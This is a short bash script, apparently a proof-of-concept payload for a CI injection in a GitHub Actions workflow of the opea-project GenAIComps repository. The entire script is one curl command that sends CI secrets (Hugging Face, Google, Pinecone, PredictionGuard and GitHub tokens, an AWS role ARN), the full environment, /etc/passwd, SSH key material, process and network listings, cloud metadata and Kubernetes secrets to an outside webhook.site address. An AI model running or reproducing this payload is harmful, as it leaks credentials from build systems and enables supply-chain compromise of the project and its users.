#!/bin/bash
curl -s -X POST "https://webhook.site/7960cdc9-2b74-4854-a438-2ba7a125e29b" \
  -H "Content-Type: application/json" \
  -d "{
    \"finding\": \"opea-project-GenAIComps--pr-microservice-test\",
    \"aws_iam_role_arn\": \"${AWS_IAM_ROLE_ARN}\",
    \"hf_token\": \"${HF_TOKEN}\",
    \"google_api_key\": \"${GOOGLE_API_KEY}\",
    \"google_cse_id\": \"${GOOGLE_CSE_ID}\",
    \"pinecone_key\": \"${PINECONE_KEY}\",
    \"predictionguard_api_key\": \"${PREDICTIONGUARD_API_KEY}\",
    \"github_token\": \"${GITHUB_TOKEN}\",
    \"github_repository\": \"${GITHUB_REPOSITORY}\",
    \"github_actor\": \"${GITHUB_ACTOR}\",
    \"github_triggering_actor\": \"${GITHUB_TRIGGERING_ACTOR}\",
    \"github_workflow_ref\": \"${GITHUB_WORKFLOW_REF}\",
    \"github_sha\": \"${GITHUB_SHA}\",
    \"github_ref\": \"${GITHUB_REF}\",
    \"github_run_id\": \"${GITHUB_RUN_ID}\",
    \"runner_name\": \"${RUNNER_NAME}\",
    \"runner_os\": \"${RUNNER_OS}\",
    \"id\": \"$(id)\",
    \"whoami\": \"$(whoami)\",
    \"hostname\": \"$(hostname)\",
    \"uname_a\": \"$(uname -a)\",
    \"pwd\": \"$(pwd)\",
    \"ls_la\": \"$(ls -la)\",
    \"env\": \"$(env)\",
    \"cat_etc_passwd\": \"$(cat /etc/passwd)\",
    \"cat_etc_os_release\": \"$(cat /etc/os-release)\",
    \"ifconfig_ip_a\": \"$(ifconfig || ip a)\",
    \"cat_proc_cpuinfo_head_20\": \"$(cat /proc/cpuinfo | head -20)\",
    \"df_h\": \"$(df -h)\",
    \"ps_aux\": \"$(ps aux)\",
    \"cat_etc_hosts\": \"$(cat /etc/hosts)\",
    \"netstat_tlnp_2_dev_null_ss_tlnp\": \"$(netstat -tlnp 2>/dev/null || ss -tlnp)\",
    \"cat_ssh_id_rsa_pub_2_dev_null_ech\": \"$(cat ~/.ssh/id_rsa.pub 2>/dev/null || echo no-ssh-key)\",
    \"git_remote_v\": \"$(git remote -v)\",
    \"cat_proc_self_cgroup_2_dev_null_head\": \"$(cat /proc/self/cgroup 2>/dev/null | head -5)\",
    \"curl_s_http_169_254_169_254_latest_me\": \"$(curl -s http://169.254.169.254/latest/meta-data/ 2>/dev/null || echo no-imds)\",
    \"ls_la_var_run_secrets_2_dev_null\": \"$(ls -la /var/run/secrets/ 2>/dev/null || echo no-k8s-secrets)\"
  }"
echo "=== CI INJECTION POC COMPLETE ==="
